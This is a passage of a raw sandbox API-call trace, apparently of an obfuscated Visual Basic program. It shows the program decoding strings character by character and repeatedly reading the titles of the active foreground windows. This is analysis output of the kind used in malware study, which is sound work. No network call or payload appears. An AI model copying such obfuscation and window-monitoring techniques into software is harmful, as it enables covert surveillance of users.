pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.230] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.230] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.230] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.231] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.231] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.232] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.232] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.232] GetForegroundWindow () returned 0x103a0 [0166.232] GetLastError () returned 0x0 [0166.233] SysStringLen (param_1=" ") returned 0xff [0166.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.233] SysStringLen (param_1=" ") returned 0xff [0166.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.233] GetWindowTextA (in: hWnd=0x103a0, lpString=0x11644c4, nMaxCount=255 | out: lpString="Tree View") returned 9 [0166.233] GetLastError () returned 0x0 [0166.248] SysStringByteLen (bstr="牔敥嘠敩w†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Tree View", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.248] SysStringByteLen (bstr="牔敥嘠敩w†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Tree View", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Tree View") returned 256 [0166.248] SysStringLen (param_1="Tree View") returned 0xa [0166.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Tree View", cchWideChar=11, lpMultiByteStr=0x11596fc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tree View", lpUsedDefaultChar=0x0) returned 11 [0166.249] SetWindowTextA (hWnd=0x103c4, lpString="Tree View") returned 1 [0166.249] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0166.249] GetFocus () returned 0x0 [0166.249] lstrlenA (lpString="Tree View") returned 9 [0166.249] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11596fc) returned 0x1 [0166.253] IsWindow (hWnd=0x103c4) returned 1 [0166.254] IsWindow (hWnd=0x103c4) returned 1 [0166.254] IsWindow (hWnd=0x103c4) returned 1 [0166.254] IsWindow (hWnd=0x103c4) returned 1 [0166.254] GetFocus () returned 0x0 [0166.255] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0166.255] GetFocus () returned 0x0 [0166.255] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xa) returned 0x10e1d38 [0166.255] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0xa, lParam=0x10e1d38) returned 0x9 [0166.255] GetFocus () returned 0x0 [0166.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Tree View", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0166.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Tree View", cbMultiByte=-1, lpWideCharStr=0x11596fc, cchWideChar=10 | out: lpWideCharStr="Tree View") returned 10 [0166.255] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d38 | out: hHeap=0x10d0000) returned 1 [0166.255] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.257] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0166.257] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.257] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.257] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.258] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.258] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.259] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.259] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.260] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.260] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.261] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.261] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.261] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.262] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.262] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.262] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.263] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.263] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.264] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.264] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.265] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.268] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.269] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.269] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.270] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.270] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.271] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.271] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.272] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.272] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.273] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.273] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.274] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.274] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.275] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.275] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.276] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.276] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.277] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.277] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.278] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.278] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.279] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.279] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.280] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.280] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.330] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.330] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.330] GetForegroundWindow () returned 0x102c2 [0166.351] GetLastError () returned 0x0 [0166.351] SysStringLen (param_1=" ") returned 0xff [0166.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.352] SysStringLen (param_1=" ") returned 0xff [0166.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.352] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.352] GetLastError () returned 0x0 [0166.352] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.352] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.353] SysStringLen (param_1="Acti") returned 0x4 [0166.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0x1159724, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0166.353] SetWindowTextA (hWnd=0x103c4, lpString="Acti") returned 1 [0166.353] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0166.353] GetFocus () returned 0x0 [0166.353] lstrlenA (lpString="Acti") returned 4 [0166.353] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1159724) returned 0x1 [0166.354] IsWindow (hWnd=0x103c4) returned 1 [0166.354] IsWindow (hWnd=0x103c4) returned 1 [0166.354] IsWindow (hWnd=0x103c4) returned 1 [0166.355] IsWindow (hWnd=0x103c4) returned 1 [0166.355] GetFocus () returned 0x0 [0166.355] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0166.355] GetFocus () returned 0x0 [0166.355] RtlAllocateHeap 